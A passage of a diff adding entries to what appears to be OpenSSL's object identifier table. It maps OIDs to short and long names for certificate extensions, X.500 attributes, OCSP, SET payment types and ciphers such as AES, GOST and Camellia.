+# CRMF registration
+id-pkip 1		: id-regCtrl
+id-pkip 2		: id-regInfo
+
+# CRMF registration controls
+id-regCtrl 1		: id-regCtrl-regToken
+id-regCtrl 2		: id-regCtrl-authenticator
+id-regCtrl 3		: id-regCtrl-pkiPublicationInfo
+id-regCtrl 4		: id-regCtrl-pkiArchiveOptions
+id-regCtrl 5		: id-regCtrl-oldCertID
+id-regCtrl 6		: id-regCtrl-protocolEncrKey
+
+# CRMF registration information
+id-regInfo 1		: id-regInfo-utf8Pairs
+id-regInfo 2		: id-regInfo-certReq
+
+# algorithms
+id-alg 1		: id-alg-des40
+id-alg 2		: id-alg-noSignature
+id-alg 3		: id-alg-dh-sig-hmac-sha1
+id-alg 4		: id-alg-dh-pop
+
+# CMC controls
+id-cmc 1		: id-cmc-statusInfo
+id-cmc 2		: id-cmc-identification
+id-cmc 3		: id-cmc-identityProof
+id-cmc 4		: id-cmc-dataReturn
+id-cmc 5		: id-cmc-transactionId
+id-cmc 6		: id-cmc-senderNonce
+id-cmc 7		: id-cmc-recipientNonce
+id-cmc 8		: id-cmc-addExtensions
+id-cmc 9		: id-cmc-encryptedPOP
+id-cmc 10		: id-cmc-decryptedPOP
+id-cmc 11		: id-cmc-lraPOPWitness
+id-cmc 15		: id-cmc-getCert
+id-cmc 16		: id-cmc-getCRL
+id-cmc 17		: id-cmc-revokeRequest
+id-cmc 18		: id-cmc-regInfo
+id-cmc 19		: id-cmc-responseInfo
+id-cmc 21		: id-cmc-queryPending
+id-cmc 22		: id-cmc-popLinkRandom
+id-cmc 23		: id-cmc-popLinkWitness
+id-cmc 24		: id-cmc-confirmCertAcceptance 
+
+# other names
+id-on 1			: id-on-personalData
+id-on 3			: id-on-permanentIdentifier : Permanent Identifier
+
+# personal data attributes
+id-pda 1		: id-pda-dateOfBirth
+id-pda 2		: id-pda-placeOfBirth
+id-pda 3		: id-pda-gender
+id-pda 4		: id-pda-countryOfCitizenship
+id-pda 5		: id-pda-countryOfResidence
+
+# attribute certificate attributes
+id-aca 1		: id-aca-authenticationInfo
+id-aca 2		: id-aca-accessIdentity
+id-aca 3		: id-aca-chargingIdentity
+id-aca 4		: id-aca-group
+# attention : the following seems to be obsolete, replace by 'role'
+id-aca 5		: id-aca-role
+id-aca 6		: id-aca-encAttrs
+
+# qualified certificate statements
+id-qcs 1		: id-qcs-pkixQCSyntax-v1
+
+# CMC content types
+id-cct 1		: id-cct-crs
+id-cct 2		: id-cct-PKIData
+id-cct 3		: id-cct-PKIResponse
+
+# Predefined Proxy Certificate policy languages
+id-ppl 0		: id-ppl-anyLanguage	: Any language
+id-ppl 1		: id-ppl-inheritAll	: Inherit all
+id-ppl 2		: id-ppl-independent	: Independent
+
+# access descriptors for authority info access extension
+!Cname ad-OCSP
+id-ad 1			: OCSP			: OCSP
+!Cname ad-ca-issuers
+id-ad 2			: caIssuers		: CA Issuers
+!Cname ad-timeStamping
+id-ad 3			: ad_timestamping	: AD Time Stamping
+!Cname ad-dvcs
+id-ad 4			: AD_DVCS		: ad dvcs
+id-ad 5			: caRepository		: CA Repository
+
+
+!Alias id-pkix-OCSP ad-OCSP
+!module id-pkix-OCSP
+!Cname basic
+id-pkix-OCSP 1		: basicOCSPResponse	: Basic OCSP Response
+id-pkix-OCSP 2		: Nonce			: OCSP Nonce
+id-pkix-OCSP 3		: CrlID			: OCSP CRL ID
+id-pkix-OCSP 4		: acceptableResponses	: Acceptable OCSP Responses
+id-pkix-OCSP 5		: noCheck		: OCSP No Check
+id-pkix-OCSP 6		: archiveCutoff		: OCSP Archive Cutoff
+id-pkix-OCSP 7		: serviceLocator	: OCSP Service Locator
+id-pkix-OCSP 8		: extendedStatus	: Extended OCSP Status
+id-pkix-OCSP 9		: valid
+id-pkix-OCSP 10		: path
+id-pkix-OCSP 11		: trustRoot		: Trust Root
+!global
+
+1 3 14 3 2		: algorithm		: algorithm
+algorithm 3		: RSA-NP-MD5		: md5WithRSA
+algorithm 6		: DES-ECB		: des-ecb
+algorithm 7		: DES-CBC		: des-cbc
+!Cname des-ofb64
+algorithm 8		: DES-OFB		: des-ofb
+!Cname des-cfb64
+algorithm 9		: DES-CFB		: des-cfb
+algorithm 11		: rsaSignature
+!Cname dsa-2
+algorithm 12		: DSA-old		: dsaEncryption-old
+algorithm 13		: DSA-SHA		: dsaWithSHA
+algorithm 15		: RSA-SHA		: shaWithRSAEncryption
+!Cname des-ede-ecb
+algorithm 17		: DES-EDE		: des-ede
+!Cname des-ede3-ecb
+			: DES-EDE3		: des-ede3
+			: DES-EDE-CBC		: des-ede-cbc
+!Cname des-ede-cfb64
+			: DES-EDE-CFB		: des-ede-cfb
+!Cname des-ede3-cfb64
+			: DES-EDE3-CFB		: des-ede3-cfb
+!Cname des-ede-ofb64
+			: DES-EDE-OFB		: des-ede-ofb
+!Cname des-ede3-ofb64
+			: DES-EDE3-OFB		: des-ede3-ofb
+			: DESX-CBC		: desx-cbc
+algorithm 18		: SHA			: sha
+algorithm 26		: SHA1			: sha1
+!Cname dsaWithSHA1-2
+algorithm 27		: DSA-SHA1-old		: dsaWithSHA1-old
+algorithm 29		: RSA-SHA1-2		: sha1WithRSA
+
+1 3 36 3 2 1		: RIPEMD160		: ripemd160
+1 3 36 3 3 1 2		: RSA-RIPEMD160		: ripemd160WithRSA
+
+!Cname sxnet
+1 3 101 1 4 1		: SXNetID		: Strong Extranet ID
+
+2 5			: X500			: directory services (X.500)
+
+X500 4			: X509
+X509 3			: CN			: commonName
+X509 4			: SN			: surname
+X509 5			: 			: serialNumber
+X509 6			: C			: countryName
+X509 7			: L			: localityName
+X509 8			: ST			: stateOrProvinceName
+X509 9			: street		: streetAddress
+X509 10			: O			: organizationName
+X509 11			: OU			: organizationalUnitName
+X509 12			: title			: title
+X509 13			: 			: description
+X509 14			: 			: searchGuide
+X509 15			: 			: businessCategory
+X509 16			: 			: postalAddress
+X509 17			: 			: postalCode
+X509 18			: 			: postOfficeBox
+X509 19			: 			: physicalDeliveryOfficeName
+X509 20			: 			: telephoneNumber
+X509 21			: 			: telexNumber
+X509 22			: 			: teletexTerminalIdentifier
+X509 23			: 			: facsimileTelephoneNumber
+X509 24			: 			: x121Address
+X509 25			: 			: internationaliSDNNumber
+X509 26			: 			: registeredAddress
+X509 27			: 			: destinationIndicator
+X509 28			: 			: preferredDeliveryMethod
+X509 29			: 			: presentationAddress
+X509 30			: 			: supportedApplicationContext
+X509 31			: member		:
+X509 32			: owner			:
+X509 33			: 			: roleOccupant
+X509 34			: seeAlso		:
+X509 35			: 			: userPassword
+X509 36			: 			: userCertificate
+X509 37			: 			: cACertificate
+X509 38			: 			: authorityRevocationList
+X509 39			: 			: certificateRevocationList
+X509 40			: 			: crossCertificatePair
+X509 41			: name			: name
+X509 42			: GN			: givenName
+X509 43			: initials		: initials
+X509 44			: 			: generationQualifier
+X509 45			: 			: x500UniqueIdentifier
+X509 46			: dnQualifier		: dnQualifier
+X509 47			: 			: enhancedSearchGuide
+X509 48			: 			: protocolInformation
+X509 49			: 			: distinguishedName
+X509 50			: 			: uniqueMember
+X509 51			: 			: houseIdentifier
+X509 52			: 			: supportedAlgorithms
+X509 53			: 			: deltaRevocationList
+X509 54			: dmdName		:
+X509 65			:			: pseudonym
+X509 72			: role			: role
+
+X500 8			: X500algorithms	: directory services - algorithms
+X500algorithms 1 1	: RSA			: rsa
+X500algorithms 3 100	: RSA-MDC2		: mdc2WithRSA
+X500algorithms 3 101	: MDC2			: mdc2
+
+X500 29			: id-ce
+!Cname subject-directory-attributes
+id-ce 9			: subjectDirectoryAttributes : X509v3 Subject Directory Attributes
+!Cname subject-key-identifier
+id-ce 14		: subjectKeyIdentifier	: X509v3 Subject Key Identifier
+!Cname key-usage
+id-ce 15		: keyUsage		: X509v3 Key Usage
+!Cname private-key-usage-period
+id-ce 16		: privateKeyUsagePeriod	: X509v3 Private Key Usage Period
+!Cname subject-alt-name
+id-ce 17		: subjectAltName	: X509v3 Subject Alternative Name
+!Cname issuer-alt-name
+id-ce 18		: issuerAltName		: X509v3 Issuer Alternative Name
+!Cname basic-constraints
+id-ce 19		: basicConstraints	: X509v3 Basic Constraints
+!Cname crl-number
+id-ce 20		: crlNumber		: X509v3 CRL Number
+!Cname crl-reason
+id-ce 21		: CRLReason		: X509v3 CRL Reason Code
+!Cname invalidity-date
+id-ce 24		: invalidityDate	: Invalidity Date
+!Cname delta-crl
+id-ce 27		: deltaCRL		: X509v3 Delta CRL Indicator
+!Cname issuing-distribution-point
+id-ce 28		: issuingDistributionPoint : X509v3 Issuing Distrubution Point
+!Cname certificate-issuer
+id-ce 29		: certificateIssuer	: X509v3 Certificate Issuer
+!Cname name-constraints
+id-ce 30		: nameConstraints	: X509v3 Name Constraints
+!Cname crl-distribution-points
+id-ce 31		: crlDistributionPoints	: X509v3 CRL Distribution Points
+!Cname certificate-policies
+id-ce 32		: certificatePolicies	: X509v3 Certificate Policies
+!Cname any-policy
+certificate-policies 0	: anyPolicy		: X509v3 Any Policy
+!Cname policy-mappings
+id-ce 33		: policyMappings	: X509v3 Policy Mappings
+!Cname authority-key-identifier
+id-ce 35		: authorityKeyIdentifier : X509v3 Authority Key Identifier
+!Cname policy-constraints
+id-ce 36		: policyConstraints	: X509v3 Policy Constraints
+!Cname ext-key-usage
+id-ce 37		: extendedKeyUsage	: X509v3 Extended Key Usage
+!Cname freshest-crl
+id-ce 46		: freshestCRL		: X509v3 Freshest CRL
+!Cname inhibit-any-policy
+id-ce 54		: inhibitAnyPolicy	: X509v3 Inhibit Any Policy
+!Cname target-information
+id-ce 55		: targetInformation	: X509v3 AC Targeting
+!Cname no-rev-avail
+id-ce 56		: noRevAvail		: X509v3 No Revocation Available
+
+# From RFC5280
+ext-key-usage 0		: anyExtendedKeyUsage	: Any Extended Key Usage
+
+
+!Cname netscape
+2 16 840 1 113730	: Netscape		: Netscape Communications Corp.
+!Cname netscape-cert-extension
+netscape 1		: nsCertExt		: Netscape Certificate Extension
+!Cname netscape-data-type
+netscape 2		: nsDataType		: Netscape Data Type
+!Cname netscape-cert-type
+netscape-cert-extension 1 : nsCertType		: Netscape Cert Type
+!Cname netscape-base-url
+netscape-cert-extension 2 : nsBaseUrl		: Netscape Base Url
+!Cname netscape-revocation-url
+netscape-cert-extension 3 : nsRevocationUrl	: Netscape Revocation Url
+!Cname netscape-ca-revocation-url
+netscape-cert-extension 4 : nsCaRevocationUrl	: Netscape CA Revocation Url
+!Cname netscape-renewal-url
+netscape-cert-extension 7 : nsRenewalUrl	: Netscape Renewal Url
+!Cname netscape-ca-policy-url
+netscape-cert-extension 8 : nsCaPolicyUrl	: Netscape CA Policy Url
+!Cname netscape-ssl-server-name
+netscape-cert-extension 12 : nsSslServerName	: Netscape SSL Server Name
+!Cname netscape-comment
+netscape-cert-extension 13 : nsComment		: Netscape Comment
+!Cname netscape-cert-sequence
+netscape-data-type 5	: nsCertSequence	: Netscape Certificate Sequence
+!Cname ns-sgc
+netscape 4 1		: nsSGC			: Netscape Server Gated Crypto
+
+# iso(1)
+iso 3			: ORG			: org
+org 6			: DOD			: dod
+dod 1			: IANA			: iana
+!Alias internet iana
+
+internet 1		: directory		: Directory
+internet 2		: mgmt			: Management
+internet 3		: experimental		: Experimental
+internet 4		: private		: Private
+internet 5		: security		: Security
+internet 6		: snmpv2		: SNMPv2
+# Documents refer to "internet 7" as "mail". This however leads to ambiguities
+# with RFC2798, Section 9.1.3, where "mail" is defined as the short name for
+# rfc822Mailbox. The short name is therefore here left out for a reason.
+# Subclasses of "mail", e.g. "MIME MHS" don't consitute a problem, as
+# references are realized via long name "Mail" (with capital M).
+internet 7		:			: Mail
+
+Private 1		: enterprises		: Enterprises
+
+# RFC 2247
+Enterprises 1466 344	: dcobject		: dcObject
+
+# RFC 1495
+Mail 1			: mime-mhs		: MIME MHS
+mime-mhs 1		: mime-mhs-headings	: mime-mhs-headings
+mime-mhs 2		: mime-mhs-bodies	: mime-mhs-bodies
+mime-mhs-headings 1	: id-hex-partial-message : id-hex-partial-message
+mime-mhs-headings 2	: id-hex-multipart-message : id-hex-multipart-message
+
+# What the hell are these OIDs, really?
+!Cname rle-compression
+1 1 1 1 666 1		: RLE			: run length compression
+!Cname zlib-compression
+id-smime-alg 8		: ZLIB			: zlib compression
+
+# AES aka Rijndael
+
+!Alias csor 2 16 840 1 101 3
+!Alias nistAlgorithms csor 4
+!Alias aes nistAlgorithms 1
+
+aes 1			: AES-128-ECB		: aes-128-ecb
+aes 2			: AES-128-CBC		: aes-128-cbc
+!Cname aes-128-ofb128
+aes 3			: AES-128-OFB		: aes-128-ofb
+!Cname aes-128-cfb128
+aes 4			: AES-128-CFB		: aes-128-cfb
+aes 5			: id-aes128-wrap
+aes 6			: id-aes128-GCM		: aes-128-gcm
+aes 7			: id-aes128-CCM		: aes-128-ccm
+aes 8			: id-aes128-wrap-pad
+
+aes 21			: AES-192-ECB		: aes-192-ecb
+aes 22			: AES-192-CBC		: aes-192-cbc
+!Cname aes-192-ofb128
+aes 23			: AES-192-OFB		: aes-192-ofb
+!Cname aes-192-cfb128
+aes 24			: AES-192-CFB		: aes-192-cfb
+aes 25			: id-aes192-wrap
+aes 26			: id-aes192-GCM		: aes-192-gcm
+aes 27			: id-aes192-CCM		: aes-192-ccm
+aes 28			: id-aes192-wrap-pad
+
+aes 41			: AES-256-ECB		: aes-256-ecb
+aes 42			: AES-256-CBC		: aes-256-cbc
+!Cname aes-256-ofb128
+aes 43			: AES-256-OFB		: aes-256-ofb
+!Cname aes-256-cfb128
+aes 44			: AES-256-CFB		: aes-256-cfb
+aes 45			: id-aes256-wrap
+aes 46			: id-aes256-GCM		: aes-256-gcm
+aes 47			: id-aes256-CCM		: aes-256-ccm
+aes 48			: id-aes256-wrap-pad
+
+# There are no OIDs for these modes...
+
+			: AES-128-CFB1		: aes-128-cfb1
+			: AES-192-CFB1		: aes-192-cfb1
+			: AES-256-CFB1		: aes-256-cfb1
+			: AES-128-CFB8		: aes-128-cfb8
+			: AES-192-CFB8		: aes-192-cfb8
+			: AES-256-CFB8		: aes-256-cfb8
+			: AES-128-CTR		: aes-128-ctr
+			: AES-192-CTR		: aes-192-ctr
+			: AES-256-CTR		: aes-256-ctr
+			: AES-128-XTS		: aes-128-xts
+			: AES-256-XTS		: aes-256-xts
+			: DES-CFB1		: des-cfb1
+			: DES-CFB8		: des-cfb8
+			: DES-EDE3-CFB1		: des-ede3-cfb1
+			: DES-EDE3-CFB8		: des-ede3-cfb8
+
+# OIDs for SHA224, SHA256, SHA385 and SHA512, according to x9.84.
+!Alias nist_hashalgs nistAlgorithms 2
+nist_hashalgs 1		: SHA256		: sha256
+nist_hashalgs 2		: SHA384		: sha384
+nist_hashalgs 3		: SHA512		: sha512
+nist_hashalgs 4		: SHA224		: sha224
+
+# OIDs for dsa-with-sha224 and dsa-with-sha256
+!Alias dsa_with_sha2 nistAlgorithms 3
+dsa_with_sha2 1		: dsa_with_SHA224
+dsa_with_sha2 2		: dsa_with_SHA256
+
+# Hold instruction CRL entry extension
+!Cname hold-instruction-code
+id-ce 23		: holdInstructionCode	: Hold Instruction Code
+!Alias holdInstruction	X9-57 2
+!Cname hold-instruction-none
+holdInstruction 1	: holdInstructionNone	: Hold Instruction None
+!Cname hold-instruction-call-issuer
+holdInstruction 2	: holdInstructionCallIssuer : Hold Instruction Call Issuer
+!Cname hold-instruction-reject
+holdInstruction 3	: holdInstructionReject	: Hold Instruction Reject
+
+# OID's from ITU-T.  Most of this is defined in RFC 1274.  A couple of
+# them are also mentioned in RFC 2247
+itu-t 9			: data
+data 2342		: pss
+pss 19200300		: ucl
+ucl 100			: pilot
+pilot 1			:			: pilotAttributeType
+pilot 3			:			: pilotAttributeSyntax
+pilot 4			:			: pilotObjectClass
+pilot 10		:			: pilotGroups
+pilotAttributeSyntax 4	:			: iA5StringSyntax
+pilotAttributeSyntax 5	:			: caseIgnoreIA5StringSyntax
+pilotObjectClass 3	:			: pilotObject
+pilotObjectClass 4	:			: pilotPerson
+pilotObjectClass 5	: account
+pilotObjectClass 6	: document
+pilotObjectClass 7	: room
+pilotObjectClass 9	:			: documentSeries
+pilotObjectClass 13	: domain		: Domain
+pilotObjectClass 14	:			: rFC822localPart
+pilotObjectClass 15	:			: dNSDomain
+pilotObjectClass 17	:			: domainRelatedObject
+pilotObjectClass 18	:			: friendlyCountry
+pilotObjectClass 19	:			: simpleSecurityObject
+pilotObjectClass 20	:			: pilotOrganization
+pilotObjectClass 21	:			: pilotDSA
+pilotObjectClass 22	:			: qualityLabelledData
+pilotAttributeType 1	: UID			: userId
+pilotAttributeType 2	:			: textEncodedORAddress
+pilotAttributeType 3	: mail			: rfc822Mailbox
+pilotAttributeType 4	: info
+pilotAttributeType 5	:			: favouriteDrink
+pilotAttributeType 6	:			: roomNumber
+pilotAttributeType 7	: photo
+pilotAttributeType 8	:			: userClass
+pilotAttributeType 9	: host
+pilotAttributeType 10	: manager
+pilotAttributeType 11	:			: documentIdentifier
+pilotAttributeType 12	:			: documentTitle
+pilotAttributeType 13	:			: documentVersion
+pilotAttributeType 14	:			: documentAuthor
+pilotAttributeType 15	:			: documentLocation
+pilotAttributeType 20	:			: homeTelephoneNumber
+pilotAttributeType 21	: secretary
+pilotAttributeType 22	:			: otherMailbox
+pilotAttributeType 23	:			: lastModifiedTime
+pilotAttributeType 24	:			: lastModifiedBy
+pilotAttributeType 25	: DC			: domainComponent
+pilotAttributeType 26	:			: aRecord
+pilotAttributeType 27	:			: pilotAttributeType27
+pilotAttributeType 28	:			: mXRecord
+pilotAttributeType 29	:			: nSRecord
+pilotAttributeType 30	:			: sOARecord
+pilotAttributeType 31	:			: cNAMERecord
+pilotAttributeType 37	:			: associatedDomain
+pilotAttributeType 38	:			: associatedName
+pilotAttributeType 39	:			: homePostalAddress
+pilotAttributeType 40	:			: personalTitle
+pilotAttributeType 41	:			: mobileTelephoneNumber
+pilotAttributeType 42	:			: pagerTelephoneNumber
+pilotAttributeType 43	:			: friendlyCountryName
+# The following clashes with 2.5.4.45, so commented away
+#pilotAttributeType 44	: uid			: uniqueIdentifier
+pilotAttributeType 45	:			: organizationalStatus
+pilotAttributeType 46	:			: janetMailbox
+pilotAttributeType 47	:			: mailPreferenceOption
+pilotAttributeType 48	:			: buildingName
+pilotAttributeType 49	:			: dSAQuality
+pilotAttributeType 50	:			: singleLevelQuality
+pilotAttributeType 51	:			: subtreeMinimumQuality
+pilotAttributeType 52	:			: subtreeMaximumQuality
+pilotAttributeType 53	:			: personalSignature
+pilotAttributeType 54	:			: dITRedirect
+pilotAttributeType 55	: audio
+pilotAttributeType 56	:			: documentPublisher
+
+international-organizations 42	: id-set	: Secure Electronic Transactions
+
+id-set 0		: set-ctype		: content types
+id-set 1		: set-msgExt		: message extensions
+id-set 3		: set-attr
+id-set 5		: set-policy
+id-set 7		: set-certExt		: certificate extensions
+id-set 8		: set-brand
+
+set-ctype 0		: setct-PANData
+set-ctype 1		: setct-PANToken
+set-ctype 2		: setct-PANOnly
+set-ctype 3		: setct-OIData
+set-ctype 4		: setct-PI
+set-ctype 5		: setct-PIData
+set-ctype 6		: setct-PIDataUnsigned
+set-ctype 7		: setct-HODInput
+set-ctype 8		: setct-AuthResBaggage
+set-ctype 9		: setct-AuthRevReqBaggage
+set-ctype 10		: setct-AuthRevResBaggage
+set-ctype 11		: setct-CapTokenSeq
+set-ctype 12		: setct-PInitResData
+set-ctype 13		: setct-PI-TBS
+set-ctype 14		: setct-PResData
+set-ctype 16		: setct-AuthReqTBS
+set-ctype 17		: setct-AuthResTBS
+set-ctype 18		: setct-AuthResTBSX
+set-ctype 19		: setct-AuthTokenTBS
+set-ctype 20		: setct-CapTokenData
+set-ctype 21		: setct-CapTokenTBS
+set-ctype 22		: setct-AcqCardCodeMsg
+set-ctype 23		: setct-AuthRevReqTBS
+set-ctype 24		: setct-AuthRevResData
+set-ctype 25		: setct-AuthRevResTBS
+set-ctype 26		: setct-CapReqTBS
+set-ctype 27		: setct-CapReqTBSX
+set-ctype 28		: setct-CapResData
+set-ctype 29		: setct-CapRevReqTBS
+set-ctype 30		: setct-CapRevReqTBSX
+set-ctype 31		: setct-CapRevResData
+set-ctype 32		: setct-CredReqTBS
+set-ctype 33		: setct-CredReqTBSX
+set-ctype 34		: setct-CredResData
+set-ctype 35		: setct-CredRevReqTBS
+set-ctype 36		: setct-CredRevReqTBSX
+set-ctype 37		: setct-CredRevResData
+set-ctype 38		: setct-PCertReqData
+set-ctype 39		: setct-PCertResTBS
+set-ctype 40		: setct-BatchAdminReqData
+set-ctype 41		: setct-BatchAdminResData
+set-ctype 42		: setct-CardCInitResTBS
+set-ctype 43		: setct-MeAqCInitResTBS
+set-ctype 44		: setct-RegFormResTBS
+set-ctype 45		: setct-CertReqData
+set-ctype 46		: setct-CertReqTBS
+set-ctype 47		: setct-CertResData
+set-ctype 48		: setct-CertInqReqTBS
+set-ctype 49		: setct-ErrorTBS
+set-ctype 50		: setct-PIDualSignedTBE
+set-ctype 51		: setct-PIUnsignedTBE
+set-ctype 52		: setct-AuthReqTBE
+set-ctype 53		: setct-AuthResTBE
+set-ctype 54		: setct-AuthResTBEX
+set-ctype 55		: setct-AuthTokenTBE
+set-ctype 56		: setct-CapTokenTBE
+set-ctype 57		: setct-CapTokenTBEX
+set-ctype 58		: setct-AcqCardCodeMsgTBE
+set-ctype 59		: setct-AuthRevReqTBE
+set-ctype 60		: setct-AuthRevResTBE
+set-ctype 61		: setct-AuthRevResTBEB
+set-ctype 62		: setct-CapReqTBE
+set-ctype 63		: setct-CapReqTBEX
+set-ctype 64		: setct-CapResTBE
+set-ctype 65		: setct-CapRevReqTBE
+set-ctype 66		: setct-CapRevReqTBEX
+set-ctype 67		: setct-CapRevResTBE
+set-ctype 68		: setct-CredReqTBE
+set-ctype 69		: setct-CredReqTBEX
+set-ctype 70		: setct-CredResTBE
+set-ctype 71		: setct-CredRevReqTBE
+set-ctype 72		: setct-CredRevReqTBEX
+set-ctype 73		: setct-CredRevResTBE
+set-ctype 74		: setct-BatchAdminReqTBE
+set-ctype 75		: setct-BatchAdminResTBE
+set-ctype 76		: setct-RegFormReqTBE
+set-ctype 77		: setct-CertReqTBE
+set-ctype 78		: setct-CertReqTBEX
+set-ctype 79		: setct-CertResTBE
+set-ctype 80		: setct-CRLNotificationTBS
+set-ctype 81		: setct-CRLNotificationResTBS
+set-ctype 82		: setct-BCIDistributionTBS
+
+set-msgExt 1		: setext-genCrypt	: generic cryptogram
+set-msgExt 3		: setext-miAuth		: merchant initiated auth
+set-msgExt 4		: setext-pinSecure
+set-msgExt 5		: setext-pinAny
+set-msgExt 7		: setext-track2
+set-msgExt 8		: setext-cv		: additional verification
+
+set-policy 0		: set-policy-root
+
+set-certExt 0		: setCext-hashedRoot
+set-certExt 1		: setCext-certType
+set-certExt 2		: setCext-merchData
+set-certExt 3		: setCext-cCertRequired
+set-certExt 4		: setCext-tunneling
+set-certExt 5		: setCext-setExt
+set-certExt 6		: setCext-setQualf
+set-certExt 7		: setCext-PGWYcapabilities
+set-certExt 8		: setCext-TokenIdentifier
+set-certExt 9		: setCext-Track2Data
+set-certExt 10		: setCext-TokenType
+set-certExt 11		: setCext-IssuerCapabilities
+
+set-attr 0		: setAttr-Cert
+set-attr 1		: setAttr-PGWYcap	: payment gateway capabilities
+set-attr 2		: setAttr-TokenType
+set-attr 3		: setAttr-IssCap	: issuer capabilities
+
+setAttr-Cert 0		: set-rootKeyThumb
+setAttr-Cert 1		: set-addPolicy
+
+setAttr-TokenType 1	: setAttr-Token-EMV
+setAttr-TokenType 2	: setAttr-Token-B0Prime
+
+setAttr-IssCap 3	: setAttr-IssCap-CVM
+setAttr-IssCap 4	: setAttr-IssCap-T2
+setAttr-IssCap 5	: setAttr-IssCap-Sig
+
+setAttr-IssCap-CVM 1	: setAttr-GenCryptgrm	: generate cryptogram
+setAttr-IssCap-T2 1	: setAttr-T2Enc		: encrypted track 2
+setAttr-IssCap-T2 2	: setAttr-T2cleartxt	: cleartext track 2
+
+setAttr-IssCap-Sig 1	: setAttr-TokICCsig	: ICC or token signature
+setAttr-IssCap-Sig 2	: setAttr-SecDevSig	: secure device signature
+
+set-brand 1		: set-brand-IATA-ATA
+set-brand 30		: set-brand-Diners
+set-brand 34		: set-brand-AmericanExpress
+set-brand 35		: set-brand-JCB
+set-brand 4		: set-brand-Visa
+set-brand 5		: set-brand-MasterCard
+set-brand 6011		: set-brand-Novus
+
+rsadsi 3 10		: DES-CDMF		: des-cdmf
+rsadsi 1 1 6		: rsaOAEPEncryptionSET
+
+			: Oakley-EC2N-3		: ipsec3
+			: Oakley-EC2N-4		: ipsec4
+
+iso 0 10118 3 0 55	: whirlpool
+
+# GOST OIDs
+
+member-body 643 2 2	: cryptopro
+member-body 643 2 9	: cryptocom
+
+cryptopro 3		: id-GostR3411-94-with-GostR3410-2001 : GOST R 34.11-94 with GOST R 34.10-2001
+cryptopro 4		: id-GostR3411-94-with-GostR3410-94 : GOST R 34.11-94 with GOST R 34.10-94
+!Cname id-GostR3411-94
+cryptopro 9		: md_gost94		: GOST R 34.11-94
+cryptopro 10		: id-HMACGostR3411-94	: HMAC GOST 34.11-94
+!Cname id-GostR3410-2001
+cryptopro 19		: gost2001	: GOST R 34.10-2001
+!Cname id-GostR3410-94
+cryptopro 20		: gost94	: GOST R 34.10-94
+!Cname id-Gost28147-89
+cryptopro 21		: gost89 		: GOST 28147-89
+			: gost89-cnt
+!Cname id-Gost28147-89-MAC
+cryptopro 22		: gost-mac	: GOST 28147-89 MAC
+!Cname id-GostR3411-94-prf
+cryptopro 23		: prf-gostr3411-94	: GOST R 34.11-94 PRF
+cryptopro 98		: id-GostR3410-2001DH	: GOST R 34.10-2001 DH
+cryptopro 99		: id-GostR3410-94DH	: GOST R 34.10-94 DH
+
+cryptopro 14 1		: id-Gost28147-89-CryptoPro-KeyMeshing
+cryptopro 14 0		: id-Gost28147-89-None-KeyMeshing
+
+# GOST parameter set OIDs
+
+cryptopro 30 0		: id-GostR3411-94-TestParamSet
+cryptopro 30 1		: id-GostR3411-94-CryptoProParamSet
+
+cryptopro 31 0		: id-Gost28147-89-TestParamSet
+cryptopro 31 1		: id-Gost28147-89-CryptoPro-A-ParamSet
+cryptopro 31 2		: id-Gost28147-89-CryptoPro-B-ParamSet
+cryptopro 31 3		: id-Gost28147-89-CryptoPro-C-ParamSet
+cryptopro 31 4		: id-Gost28147-89-CryptoPro-D-ParamSet
+cryptopro 31 5		: id-Gost28147-89-CryptoPro-Oscar-1-1-ParamSet
+cryptopro 31 6		: id-Gost28147-89-CryptoPro-Oscar-1-0-ParamSet
+cryptopro 31 7		: id-Gost28147-89-CryptoPro-RIC-1-ParamSet
+
+cryptopro 32 0		: id-GostR3410-94-TestParamSet
+cryptopro 32 2		: id-GostR3410-94-CryptoPro-A-ParamSet
+cryptopro 32 3		: id-GostR3410-94-CryptoPro-B-ParamSet
+cryptopro 32 4		: id-GostR3410-94-CryptoPro-C-ParamSet
+cryptopro 32 5		: id-GostR3410-94-CryptoPro-D-ParamSet
+
+cryptopro 33 1		: id-GostR3410-94-CryptoPro-XchA-ParamSet
+cryptopro 33 2		: id-GostR3410-94-CryptoPro-XchB-ParamSet
+cryptopro 33 3		: id-GostR3410-94-CryptoPro-XchC-ParamSet
+
+cryptopro 35 0		: id-GostR3410-2001-TestParamSet
+cryptopro 35 1		: id-GostR3410-2001-CryptoPro-A-ParamSet
+cryptopro 35 2		: id-GostR3410-2001-CryptoPro-B-ParamSet
+cryptopro 35 3		: id-GostR3410-2001-CryptoPro-C-ParamSet
+
+cryptopro 36 0		: id-GostR3410-2001-CryptoPro-XchA-ParamSet
+cryptopro 36 1		: id-GostR3410-2001-CryptoPro-XchB-ParamSet
+
+id-GostR3410-94 1	: id-GostR3410-94-a
+id-GostR3410-94 2	: id-GostR3410-94-aBis
+id-GostR3410-94 3	: id-GostR3410-94-b
+id-GostR3410-94 4	: id-GostR3410-94-bBis
+
+# Cryptocom LTD GOST OIDs
+
+cryptocom 1 6 1		: id-Gost28147-89-cc	: GOST 28147-89 Cryptocom ParamSet
+!Cname id-GostR3410-94-cc
+cryptocom 1 5 3		: gost94cc	: GOST 34.10-94 Cryptocom
+!Cname id-GostR3410-2001-cc
+cryptocom 1 5 4		: gost2001cc	: GOST 34.10-2001 Cryptocom
+
+cryptocom 1 3 3		: id-GostR3411-94-with-GostR3410-94-cc : GOST R 34.11-94 with GOST R 34.10-94 Cryptocom
+cryptocom 1 3 4		: id-GostR3411-94-with-GostR3410-2001-cc : GOST R 34.11-94 with GOST R 34.10-2001 Cryptocom
+
+cryptocom 1 8 1		: id-GostR3410-2001-ParamSet-cc : GOST R 3410-2001 Parameter Set Cryptocom
+
+# Definitions for Camellia cipher - CBC MODE
+
+1 2 392 200011 61 1 1 1 2 : CAMELLIA-128-CBC		: camellia-128-cbc
+1 2 392 200011 61 1 1 1 3 : CAMELLIA-192-CBC		: camellia-192-cbc
+1 2 392 200011 61 1 1 1 4 : CAMELLIA-256-CBC		: camellia-256-cbc
+1 2 392 200011 61 1 1 3 2 : id-camellia128-wrap
+1 2 392 200011 61 1 1 3 3 : id-camellia192-wrap
+1 2 392 200011 61 1 1 3 4 : id-camellia256-wrap
+
+# Definitions for Camellia cipher - ECB, CFB, OFB MODE
+
+!Alias ntt-ds 0 3 4401 5
+!Alias camellia ntt-ds 3 1 9 
+
+camellia 1		: CAMELLIA-128-ECB		: camellia-128-ecb
+!Cname camellia-128-ofb128
+camellia 3		: CAMELLIA-128-OFB		: camellia-128-ofb
+!Cname camellia-128-cfb128
+camellia 4		: CAMELLIA-128-CFB		: camellia-128-cfb
+
